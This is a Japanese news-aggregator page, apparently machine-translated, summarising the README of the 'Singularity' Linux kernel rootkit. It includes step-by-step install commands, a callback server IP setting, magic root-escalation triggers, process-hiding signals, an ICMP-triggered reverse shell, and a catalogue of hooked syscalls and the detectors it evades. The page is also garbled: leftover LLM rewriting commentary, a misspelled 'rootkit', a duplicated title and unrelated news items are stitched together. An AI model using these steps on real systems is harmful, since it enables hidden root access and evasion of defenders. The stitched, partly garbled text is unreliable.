**タイトル**  
*シンギュラリティ・ルートキット:SELinux バイパスと Netlink フィルタ(SS / ConnTrack 隠蔽)*

---  

- **主な機能**  
  - SELinux のポリシーを迂回し、権限昇格を実現します。  
  - netlink フィルタを用いて、`ss` 等のツールからソケットと接続追跡エントリを隠蔽します。

- **検知・対策**  
  - 異常な netlink トラフィックパターンを監視する。  
  - SELinux が正しく設定され、強制モードで動作していることを確認する。  
  - 隠れたプロセスやネットワーク接続の定期的な監査を実施する。

---  

*高度なルートキットを監視するセキュリティチーム向けに作成*

2026/01/05 22:45

**タイトル** *シンギュラリティ・ルートキット:SELinux バイパスと Netlink フィルタ(SS / ConnTrack 隠蔽)* --- - **主な機能** - SELinux のポリシーを迂回し、権限昇格を実現します。 - netlink フィルタを用いて、`ss` 等のツールからソケットと接続追跡エントリを隠蔽します。 - **検知・対策** - 異常な netlink トラフィックパターンを監視する。 - SELinux が正しく設定され、強制モードで動作していることを確認する。 - 隠れたプロセスやネットワーク接続の定期的な監査を実施する。 --- *高度なルートキットを監視するセキュリティチーム向けに作成*

RSS: https://news.ycombinator.com/rss

要約

Japanese Translation:

以下は、欠落していた詳細をすべて取り入れつつ、テキストを簡潔で明瞭に保った改訂版です。


改訂サマリー

Singularity は、カーネル 6.x 用に設計されたオープンソースの Linux カーネルモジュール(LKM)リートキットです。プロセス、ファイル/ディレクトリ、ネットワーク活動、およびログをステルス化しつつ、権限昇格とリバースシェル機能を提供します。モジュールは ftrace を介してシステムコールをフックし、

getdents
stat
kill(ESRCH)
sched_get*
、および
/proc/[pid]
エントリをフィルタリングします。子プロセスはトレースポイントフックにより自動追跡されます。ファイル隠蔽はパターンマッチングを使用し、隠されたパスはアクセス可能ですが
ls
find
、または
locate
では見えません。ネットワークステルスは TCP/UDP ポート、conntrack エントリ、RAW ソケットトラフィックをブロックし、netlink の
SOCK_DIAG
/
NETFILTER
クエリをフィルタリングし、
 tpacket_rcv
でパケットをドロップします。

Singularity は dmesg、journalctl、klogctl、syslog、

/proc/kallsyms
/proc/kcore
/proc/vmallocinfo
、および debugfs をフックしてログをサニタイズし、機密文字列を除去します。標準的なリートキット検出器(
unhide
chkrootkit
rkhunter
)や
bpftrace
libbpf
、io_uring モニター、そして一部の Linux EDR など最新ツールを回避します。モジュールは新しいカーネルモジュールのロードを無効化し、汚染フラグをクリアし、BPF 操作をブロックし、io_uring バイパスに対抗し、カーネル汚染フラグを自動的に正規化します。

インストールにはカーネル 6.x ヘッダー、GCC/Make、および root アクセスが必要です。ロード後は

lsmod
sysfs
から自身を隠します。モジュールはアンロードをサポートしません ― 削除には再起動が必要です。Singularity は GitHub(MatheuZSecurity/Singularity)で入手可能で、x86_64 および ia32 カーネル 6.8–6.17 をサポートしています。本製品は教育目的のみで提供されており、著者は法的/倫理的配慮を警告し、プルリクエストや Discord のディスカッションを通じた研究貢献を歓迎します。


このバージョンの理由

  • 主要機能とメカニズムをすべて列挙しています。
  • 言及されている内容以外の推論は避け、ICMP トリガー型リバースシェルや SELinux バイパスなど具体的に明示しています。
  • 主要メッセージは明確です:Singularity はカーネル 6.x 用のステルスリートキットで、包括的な回避機能を備えています。

本文

Singularity – ステルス型 Linux カーネル・ルートキットのPOC


概要

  • 目的: 最新 6.x カーネル向けの高度なカーネルレベルルートキット
  • 主な機能: プロセス/ファイル/ネットワーク隠蔽、権限昇格、ログ洗浄、自身隠蔽、リモートアクセス、大規模検知回避

コア機能

機能説明
プロセス隠蔽
/proc
への可視化を完全に排除し、監視ツールや子プロセスも自動追跡。
ファイル/ディレクトリ隠蔽パターンマッチで対象を隠すが、直接アクセスは可能。
ネットワークステルスTCP/UDP 接続・ポート・conntrack エントリ・生パケットを隠蔽。
権限昇格環境変数やシグナル等複数の手段で root へ取得。
ログ洗浄
dmesg
journalctl -k
klogctl
等カーネルログをリアルタイムでフィルタ。
自己隠蔽モジュールリスト・システム監視から自分自身を削除。
リモートアクセスICMP トリガーの逆シェルで SELinux を回避。
アンチ検知eBPF、io_uring 操作をブロックし、新規モジュールロードを防止。
監査・メモリフォレンジクス回避監査メッセージを削除、
/proc/kcore
/proc/kallsyms
等をフィルタ。
cgroup/syslog フィルタリングcgroup 内の PID や syslog アクセスを隠蔽。
debugfs 回避生ブロックデバイスを読むツールの出力をフィルタ。

インストール

cd /dev/shm
git clone https://github.com/MatheuZSecurity/Singularity
cd Singularity
sudo bash setup.sh
sudo bash scripts/x.sh

モジュールは自動で隠蔽し、汚染フラグをクリアしてから設定済みファイル/プロセスの保護を開始します。


設定

  1. サーバー IP を設定
    include/core.h
    を編集
    #define YOUR_SRV_IP "192.168.1.100"      // 必要に応じて変更
    #define YOUR_SRV_IPv6 { .s6_addr = { [15] = 1 } }
    
  2. ICMP ハンドラ – 必要なら
    modules/icmp.c
    を修正。

使用方法

プロセス隠蔽

# 現在のシェルを隠す
kill -59 $$

# 特定プロセスを隠す
kill -59 <PID>

隠されたプロセスは

ps
top
htop
/proc
及び監視ツールから見えなくなります。

ファイル/ディレクトリ隠蔽

mkdir singularity
echo "secret" > singularity/data.txt
  • ls
    /
    find
    /
    locate
    は何も表示しません。
  • ただし
    cat singularity/data.txt
    でアクセス可能です。
  • cd singularity
    は失敗します。

root 化

方法コマンド
環境変数
MAGIC=mtz bash
id
が uid=0 を示す
シグナル
kill -59 $$
id
が uid=0 を示す

ネットワーク接続隠蔽

nc -lvnp 8081

監視ツール(

ss
netstat
lsof
/proc/net/nf_conntrack
)は何も報告せず、生パケットはソケットレベルでドロップされます。

ICMP 逆シェル

  1. 攻撃者側でリスナーを起動。
  2. トリガー:
    sudo python3 scripts/trigger.py <target_ip>
    
  3. 隠れた root シェルが受信され、SELinux が有効でも回避。

保護メカニズム

カテゴリ詳細
Ftrace 制御Ftrace 無効化要求は静かにブロック。
BPF 操作隠蔽 PID からの eBPF ロード/クエリをすべて遮断。
io_uringPID キャッシュで非同期 I/O バイパスを防止。
ログ洗浄カーネルログインタフェース全体に対しリアルタイムフィルタ。
ディスクフォレンジクス回避
write
システムコールで debugfs 等からの出力を洗浄。
プロセス/ファイル隠蔽
getdents
stat
openat
などシステムコールをフックし、対象を隠す。

システムコールフック表

システムコールモジュール用途
getdents
,
getdents64
hiding_directory.c
ディレクトリエントリ(PID)を隠す。
stat
,
lstat
,
newstat
hiding_stat.c
ファイルメタデータを隠しリンク数を調整。
openat
open.c
隠蔽された
/proc/[pid]
へのアクセスをブロック。
readlinkat
hiding_readlink.c
シンボリックリンク解決を遮断。
chdir
hiding_chdir.c
隠蔽ディレクトリへ移動不可に。
read
,
pread64
clear_taint_dmesg.c
カーネルログ・
/proc/kcore
などをフィルタ。
do_syslog
同上
klogctl()/syslog()
をフィルタ。
write
,
writev
hooks_write.c
ftrace 制御ブロック、ディスクフォレンジクス・ジャーナル出力をフィルタ。
sendfile
,
copy_file_range
同上保護ファイルへのコピーを遮断。
splice
,
vmsplice
,
tee
同上パイプベースの書き込みをブロック。
io_uring_enter
同上非同期 I/O バイパスを防止。
kill
,
getuid
become_root.c
root 取得トリガーとマジック環境検出。
getsid
,
getpgid
同上隠蔽 PID に対して ESRCH を返す。
sysinfo
同上プロセス数を調整。
pidfd_open
同上隠蔽 PID へのアクセス拒否。
ネットワーク (
tcp4_seq_show
等)
hiding_tcp.c
/proc/net
から接続を隠す。
tpacket_rcv
同上生ソケットパケットをドロップ。
Netlink (
recvmsg
,
netlink_unicast
)
audit.c
監査メッセージフィルタ、隠蔽 PID 用 Netlink クエリを捨てる。
bpf
bpf_hook.c
eBPF トレース操作ブロック。
モジュールロード (
init_module
,
finit_module
)
hooking_insmod.c
新規モジュールロード禁止。
ICMP 逆シェル
icmp.c
隠れた逆シェルトリガー、SELinux 回避。
TaskStats クエリ
task.c
隠蔽 PID 用 TaskStats をブロック。
Tracepoint (
sched_process_fork
)
trace.c
子プロセスを追跡。
カーネル汚染マスク
reset_tainted.c
汚染フラグクリア。
自己隠蔽
hide_module.c
モジュールリスト・sysfs から自分自身を除去。

対応環境

  • テスト済みカーネル
    • 6.8.0-79-generic
    • 6.12
    • 6.17.8-300.fc43.x86_64
  • アーキテクチャ: x86_64(主)、ia32(完全サポート)
  • 6.x 未満や ftrace が無効化されているカーネルでは動作しない可能性があります。

検知・回避概要

領域回避技術
プロセス監視
ps
top
htop
を syscall フックで隠蔽。
ファイルシステム
ls
find
locate
stat
などをフィルタ。
ディスクフォレンジクスdebugfs、e2fsck の出力を write フックで洗浄。
メモリフォレンジクス
/proc/kcore
を Volatility 等から隠蔽。
ネットワーク
netstat
ss
lsof
、tcpdump、wireshark、conntrack などを抑制。
ログ・トレース
dmesg
journalctl -k
klogctl
、strace、ltrace、ftrace、perf、bpftrace、bpftool、libbpf をフィルタまたはブロック。
ルートキット検出ツール
unhide
chkrootkit
rkhunter
を回避。
モジュール検出
lsmod
modinfo
/sys/module
/proc/modules
、kmod を隠蔽。
最新ツールeBPF ベースの Tracee、io_uring 監視器、一部 Linux EDR を回避。

貢献と連絡先

  • GitHub:
    MatheuZSecurity/Rootkit
  • Discord:
    kprobe
  • Pull Request は改善・バグ修正・新しい回避手法の追加を歓迎します。
  • バグ報告は GitHub Issues へ。

謝辞

本プロジェクトは教育目的および許可されたセキュリティ研究のみを想定しています。所有権あるシステム、または明示的な許可がある環境でのみ使用してください。無断アクセスは多くの法域で違法です。著者は不正利用に対して一切責任を負いません。

同じ日のほかのニュース

一覧に戻る →

2026/01/06 6:05

ベネズエラで停電が起きた際に、BGP に異常が発生しました。

## Japanese Translation: --- ## Summary ロウオービットセキュリティのニュースレターは、ベネズエラが1月2日に停電した際に発生した疑わしいBGP異常を報告しています(Cloudflare Radar のタイムスタンプ 15:40 UTC)。Cloudflare Radar は CANTV (AS 8048) が自身の ASN を **10 回** 前置していることと、BGP 公開が急増し、その後広告される IP 空間が減少した異常なスパイクを示しています。200.74.224.0/20 ブロックから 8 つのプレフィックスが `…52320 8048 …` の経路で Sparkle(イタリア)と GlobeNet(コロンビア)を通じてリークされました。公開 BGP フィード(ris.ripe.net、bgpdump)は異常な AS‑path 構造を確認しており、Sparkle は RPKI フィルタリングが欠如しているため isbgpsafeyet.com で「unsafe」とリストされており、通常のトラフィックにとってルートが魅力的ではありません。 WHOIS データはリークされたプレフィックスがカラカスの Dayco Telecom に属していることを示しています。逆 DNS ルックアップは、これらの範囲が銀行、ISP、およびメールサーバーなどの重要インフラストラクチャをホストしていることを明らかにします。BGP アクティビティのタイミングは政治的不安と一致し(1月3日に爆発報告およびマドゥロが USS Iwo Jima に登場)、国家レベルでの悪用または意図的なルーティング操作を示唆しています。 ニュースレターは、通信事業者、ホスティングプロバイダー、およびセキュリティ企業に対し、ユーザーと重要インフラストラクチャをトラフィックの傍受や劣化から保護するために BGP 検証(例:RPKI)を強化するよう促しています。

2026/01/06 7:10

なぜAIは2025年に就業市場に参加しなかったのでしょう?

## Japanese Translation: この記事は、2025年までにAIエージェント革命が起こるという高い期待が過大であると主張しています。サム・オルトマン、ケビン・ワイル、マーク・ベニオフはすべて急速な採用と「デジタル労働」のブームを予測しましたが、実際のテスト(例:ChatGPTエージェントがドロップダウンメニューをナビゲートするのに14分かかったケース)では、大規模言語モデルは未だ鈍く不安定であることが示されています。ガリ・マーカスやアンドレイ・カルパチといったシリコンバレーの懐疑派もこれらの限界を認めており、カルパチはこの時期を「エージェントの十年」と呼びました。著者は、まだ信頼できるデジタル従業員を構築する方法がわからないことを指摘し、未来の仮想的な利益よりも現在の控えめな能力に焦点を移すべきだと訴えています。2026年には、実際の取り組みとして段階的な統合を推奨し、企業はまず小規模プロジェクトで試験運用するよう促し、政策立案者には仮説ではなく現在直面しているAIリスクに対処するよう呼びかけています。 ## Text to translate (incorporating missing details and avoiding inference):** The article argues that high‑profile predictions of an AI‑agent revolution by 2025 have been overblown. Sam Altman, Kevin Weil, and Mark Benioff all forecasted rapid adoption and a “digital labor” boom, but real‑world tests—such as ChatGPT Agent spending fourteen minutes navigating a drop‑down menu—show that large language models remain clumsy and unreliable. Silicon Valley skeptics like Gary Marcus and Andrej Karpathy acknowledge these limitations; Karpathy even referred to the period as the “Decade of the Agent.” The author notes that we still do not know how to build reliable digital employees, and urges a shift in focus from speculative future gains to the current modest capabilities. In 2026, the piece calls for realistic engagement: incremental integration rather than wholesale automation, encouraging companies to pilot small‑scale projects first and prompting policymakers to address present AI risks instead of hypothetical ones.

2026/01/06 1:47

**Show HN:** *Tailsnitch – Tailscale 用のセキュリティ監査ツール*

## Japanese Translation: **Tailsnitch** は、52項目を7つのカテゴリ(アクセス、認証、ネットワーク、SSH、ログ、デバイス、DNS)に分類した検査で、誤設定や過度に許容的なアクセス制御、ベストプラクティス違反を監査する軽量CLIツールです。 ユーザーは `tailsnitch` のようなシンプルなコマンドで実行し、結果を severity(`--severity`)、カテゴリ(`--category`)、特定のチェックID(`--checks`)または tailnet(`--tailnet`)でフィルタリングでき、SOC 2 証拠として JSON または CSV へエクスポートできます。 ツールは `tailsnitch --fix` による対話型修復をサポートし、dry‑run、auto‑select、および古いデバイス、保留中の承認、auth keys、タグなどの問題を自動的に修正するオプションがあります。 認証は OAuth(推奨)または API キーで行われます;監査モードでは `policy_file:read` と `devices:core:read` のスコープが必要で、修復モードではさらに `auth_keys` と `devices:core` が必要です。 インストールは簡単です:GitHub Releases から事前ビルドされたバイナリをダウンロードするか、`go install github.com/Adversis/tailsnitch@latest` を実行するか、ソースコード(`git clone https://github.com/Adversis/tailsnitch.git`)をビルドします。 既知のリスクは `.tailsnitch-ignore` ファイルで抑制できます(例:`ACL‑008` や `DEV‑006` のようなエントリー)。このファイルは現在とホームディレクトリに検索され、`--no-ignore` で無効化可能です。 Tailnet‑Lock チェック(`DEV‑010`、`DEV‑012`)にはローカルの Tailscale CLI が必要で、遠隔監査時にはマシンの状態を反映し、`--tailscale-path` を使用して上書きできます。 JSON エクスポートはポストプロセッシング(例:`jq` で失敗や severity の概要を一覧表示)用に設計されており、`--soc2 json` または `--soc2 csv` により SOC 2 証拠の生成もサポートします。 最後に、Tailsnitch は CI/CD パイプライン(GitHub Actions など)へ統合でき、重大または高 severity の発見があった場合にビルドを自動的に失敗させることで、チームが継続的にセキュリティポリシーを強制するのに役立ちます。

**タイトル** *シンギュラリティ・ルートキット:SELinux バイパスと Netlink フィルタ(SS / ConnTrack 隠蔽)* --- - **主な機能** - SELinux のポリシーを迂回し、権限昇格を実現します。 - netlink フィルタを用いて、`ss` 等のツールからソケットと接続追跡エントリを隠蔽します。 - **検知・対策** - 異常な netlink トラフィックパターンを監視する。 - SELinux が正しく設定され、強制モードで動作していることを確認する。 - 隠れたプロセスやネットワーク接続の定期的な監査を実施する。 --- *高度なルートキットを監視するセキュリティチーム向けに作成* | そっか~ニュース